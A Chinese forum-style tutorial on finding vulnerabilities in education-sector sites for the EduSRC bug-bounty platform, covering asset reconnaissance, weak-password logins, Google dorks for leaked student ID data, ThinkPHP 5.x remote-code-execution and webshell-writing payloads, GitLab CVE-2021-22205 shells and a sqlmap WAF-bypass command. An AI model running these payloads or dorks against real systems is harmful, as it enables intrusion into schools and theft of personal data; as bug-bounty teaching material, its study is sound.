0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

小白快速入门src挖掘(以edusrc平台为例)

jf_Fo0qk3ln 来源:菜鸟学信安 2023-05-05 11:30 次阅读

edusrc挖掘心得

edusrc平台介绍

我们可以在关于页面看到edusrc的收录规则

现阶段,教育行业漏洞报告平台接收如下类别单位漏洞:

  • 教育部

  • 各省、自治区教育厅、直辖市教委、各级教育局

  • 学校

  • 教育相关软件

可以看到不仅是大学的资产、还有小学初中高中的教育局的也可以交到上面、而资产不仅只有网站,也可以从小程序,app方面入手,不过这方面利用难度就要大一些

一些思路

0x01信息搜集

收集到别人收集不到的资产,就能挖到别人挖不到的洞。

网络空间测绘

奇安信的鹰图,fofa等

查询教育资产的语法:domain="edu.cn"表示搜索以edu.cn为结尾的资产,ip.isp="教育",表示搜索教育网段的资产,后者的搜索规模是比前者大很多

子域名搜集

OneForAll 、github知名的子域名收集工具

目前支持一键收集:子域、子域常用端口、子域Title、子域状态、子域服务器等

site:***.edu.cn 谷歌语法也可以帮助我们找到一些域名信息

whois反查:

whois反查(知道该注册人拥有哪些域名)

电话反查

域名多的情况下,还可以域名批量反查

最后可以把以上工具搜集到的子域名去重就得到了一份完整的大学网站域名资产,这种做法对渗透一些证书大学很有帮助。

学号、身份证收集

这里就可以利用谷歌语法搜集

filetype:xls site:xxx.edu 身份证

有时候运气好就可以搜集到泄露的身份证信息,+1rank(从来没遇到过)

如果能用这种方法搜集到对应的学号身份证,就可以进系统测试了!或者直接连上vpn进内网上fscan扫描(这里的话可以通过上面说的搜集到的子域名去获得对应的内网ip地址,

指纹识别

非常有用

谷歌插件wappalyzer:

d2e9bb12-eaeb-11ed-90ce-dac502259ad0.png

c段旁站信息

这里我使用这个工具Cscan,虽然有些小bug但是也是非常推荐

d2f478e0-eaeb-11ed-90ce-dac502259ad0.png

还有一些在线网站:潮汐指纹

js api接口发现

这两个工具都可以去github下载

jsfind
Packer-Fuzzer(webpack 打包的前端都可以扫一下有惊喜

我的一些骚思路

废话不多说了

先说一下我感受的挖洞难度:证书大学站> 资产多的普通大学 > 资产多的职业学院 > 有账号密码能进内网

所以我一开始是去找那种职业学院打的,大概是排行榜50多页的学校,可以用鹰图title="xxxx"进行搜集,

d300b2b8-eaeb-11ed-90ce-dac502259ad0.jpg

因为一些带专网站的安全意识比较差的,所以有时候能遇到那种弱口令进后台文件上传拿shell的,关于弱口令:用户名一般是admin ,密码一般是123456,admin,888888 三选一,不是的话可以撤退了

弱口令真的yyds

除了弱口令

然后说一下其他思路

比如说think5未开强制路由RCE,这种网站很多大学都存在,但是寻找thinkphp符和条件的网站却很难,一种利用鹰图就是搜索默认图标hash值来寻找,但是这种估计很难捡到,但是在闲逛的过程中看到路由规则类似thinkphp的可以尝试一下(靠这个上了十多rank

d3090102-eaeb-11ed-90ce-dac502259ad0.jpg

一些payload:

5.1.x


	
?s=index/	hinkRequest/input&filter[]=system&data=pwd
?s=index/	hinkviewdriverPhp/display&content= phpinfo();?>
?s=index/	hink	emplatedriverfile/write&cacheFile=shell.php&content= phpinfo();?>
?s=index/	hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.0.x


	
?s=index/thinkconfig/get&name=database.username # 获取配置信息
?s=index/	hinkLang/load&file=../../test.jpg    # 包含任意文件
?s=index/	hinkConfig/load&file=../../t.php     # 包含任意.php文件
?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

写入 shell


	
public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../shell.php&vars[1][]=php @eval($_REQUEST[cmd]);?>

然后然后,讲一下我一些思路,使用一些Nday来快速上分,或者挖掘逻辑漏洞实现通杀

关于Nday这里举俩个例子大家自行体会

比如说你知道有一个cve 比方说这个gitlab的cve:gitlab-CVE-2021-22205,gitlab显而易见的是很多高校都有这个gitlab的托管网站

所以说我们只要把所有gitlab edu上的资产全部搜集过来然后利用脚本一一检测就了

这里说一下怎么搜集的

**先从图标下手,限定edu域名:可以看到有17条资产

d31243a2-eaeb-11ed-90ce-dac502259ad0.jpg

限定ip有27条资产

d31cd1e6-eaeb-11ed-90ce-dac502259ad0.png

去除图标的有45条资产

d32466ea-eaeb-11ed-90ce-dac502259ad0.png

把数据全部导出收集到一起,利用github上的脚本进行检测,这样就捡到俩个洞,因为gitlab这个cve是可以反弹shell的,所以12rank到手

d32eface-eaeb-11ed-90ce-dac502259ad0.jpg

再说一个比如说springboot未授权访问漏洞:

同上一样的方法:直接搜java白页,把数据导出->脚本检测

d337ef44-eaeb-11ed-90ce-dac502259ad0.png

因为范围足够大所以也能有不小收获

d3412ce4-eaeb-11ed-90ce-dac502259ad0.jpg

剩下的可以自己探索,或者有更好的思路可以交流

逻辑漏洞

这里可以使用jsfind脚本去寻找一些js接口,可能会有未授权文件上传,ssrf等等,或者在登录抓取返回包把false改成true等操作,去实现登录绕过,总之来说就是要细心的阅读源码,找接口。

sql注入

寻找注入点方法:site:edu.cn inurl:xxx.php|jsp|asp?xxx= xxx可以自己发挥想象 ,或者在一些老系统登录,支付平台上都有可能存在注入

但是sql注入大多学校都上了waf,绕过waf不容易,主要的方法有内联,分段,以及垃圾字符填充等等

这里举一个绕安全狗的例子:

这里原本的参数是a和b,但是a,b参数的输入会被waf检测,通过拦截可以看出是常见的安全狗waf,所以这里可以多添加俩个参数:aa,bb(后端不会接收这两个参数,但是安全狗不会检测注释里的内容,这样就简单绕过了),指定好注入点使用sqlmap轻松拿下。

sqlmap -u "xxx.aspx?aa=/*&a=1&b=2&bb=*/" -p "b" --random-agent

d34b1916-eaeb-11ed-90ce-dac502259ad0.jpg



审核编辑 :李倩


声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • 服务器
    +关注

    关注

    12

    文章

    8954

    浏览量

    85072
  • 漏洞
    +关注

    关注

    0

    文章

    203

    浏览量

    15347

原文标题:小白快速入门src挖掘(以edusrc平台为例)

文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    NFC核心板讲述基于AWorks平台开发的具体方法

    ZLG致远电子推出了一系列“MCU+无线”核心板,本文NFC核心板讲述基于AWorks平台开发的具体方法。
    的头像 发表于 06-22 09:16 6395次阅读
    <b class='flag-5'>以</b>NFC核心板<b class='flag-5'>为</b><b class='flag-5'>例</b>讲述基于AWorks<b class='flag-5'>平台</b>开发的具体方法

    PADS快速入门高清视频

    ` 本帖最后由 foshanlengqian 于 2015-6-23 17:35 编辑 PADS快速入门高清视频,本次视频是高清有声视频,快速上手,告别PADS小白的弱智问答,所有
    发表于 06-23 17:31

    NLPIR智能技术推动NLP语义挖掘快速发展

    产业产生重要影响,还将催生一体化数据存储处理服务器、内存计算等市场。在软件与服务领域,大数据将引发数据快速处理分析、数据挖掘技术和软件产品的发展。大数据利用将成为提高核心竞争力的关键因素。各行各业
    发表于 03-14 11:50

    [经验] 如何学习STM32的库函数(GPIO配置

    的资料跟大家分享一下。介绍如何学习、解释STM32的库函数,GPIO配置。下面是介绍内容。 意法半导体在推出STM32微控制器之初,也同时提供了一套完整细致的固件开发包,里面包含了在STM32开发
    发表于 06-19 19:53

    redhat的github使用

    github上有许多开源的项目,你可以把代码下下来学习研究。或者你也可以自己创建个项目,用github来做版本管理,比svn用起来方便多了啊。下面redhat说下怎么使用github。
    发表于 07-16 06:07

    【视频推荐】智能语音鱼缸,讲解机智云代码

    机智云代码讲解本视频智能语音鱼缸,按照如下图所示的文件内容目录,详细讲解机智云代码,如主要文件、相关函数、功能定义与数据点的关系、鱼缸电路图详解等内容,方便新手快速
    发表于 07-19 17:15

    快速移植OpenHarmony到三方芯片平台的方法

    HDF等)的移植。详细步骤在接下来的章节中介绍。移植到三方芯片平台的步骤下面树莓派3b (BCM2837) ,演示将OpenHarmony移植到树莓派的过程。准备整体构建环境将三
    发表于 04-12 11:08

    hello world介绍如何让代码部署并运行在ARM平台

    1、hello world介绍如何让代码部署并运行在ARM平台上CI(Continuous Integration)让我们可以不断对小的代码修改进行部署,测试,而不需要等代码有大
    发表于 07-11 15:44

    ULN2003继电器的作用

    ULN2003继电器的作用
    发表于 08-13 11:06 4.3w次阅读
    <b class='flag-5'>以</b>ULN2003<b class='flag-5'>为</b><b class='flag-5'>例</b>继电器的作用

    LabVIEW入门与实战开发100

    LabVIEW入门与实战开发100LabVIEW入门与实战开发100LabVIEW入门与实战开发100
    发表于 02-18 11:44 0次下载

    合泰32位单片机入门/HT32F52352

    合泰32位单片机入门/HT32F52352Hi!很高兴看到你。以前经常在CSDN上查找资料,经常能找到想要的,因此也希望在此分享自己的学习心得与收获。32位的单片机其实都差不多,
    发表于 11-18 19:51 14次下载
    合泰32位单片机<b class='flag-5'>入门</b>/<b class='flag-5'>以</b>HT32F52352<b class='flag-5'>为</b><b class='flag-5'>例</b>

    小白初学者从零开始创建stm32工程(包括带着的FreeRTOS实时操作系统快速入门

    小白初学者从零开始创建stm32工程(包括带着的FreeRTOS实时操作系统快速入门
    发表于 12-05 18:21 20次下载
    <b class='flag-5'>小白</b>初学者从零开始创建stm32工程(包括带着的FreeRTOS实时操作系统<b class='flag-5'>快速</b><b class='flag-5'>入门</b>)

    ESPHome入门00 - 简介(小白入门, 硬件准备)

    Esphome入门00- 简介(小白入门, 废话较多)
    发表于 12-16 16:52 13次下载
    ESPHome<b class='flag-5'>入门</b>00 - 简介(<b class='flag-5'>小白</b><b class='flag-5'>入门</b>, 硬件准备)

    使用RESET按钮切换LED实现快速

    电子发烧友网站提供《使用RESET按钮切换LED实现快速.zip》资料免费下载
    发表于 02-06 14:36 0次下载
    使用RESET按钮切换LED<b class='flag-5'>以</b>实现<b class='flag-5'>快速</b>用<b class='flag-5'>例</b>

    ALLEGRO 约束规则设置步骤(DDR ).zip

    ALLEGRO约束规则设置步骤(DDR
    发表于 12-30 09:19 11次下载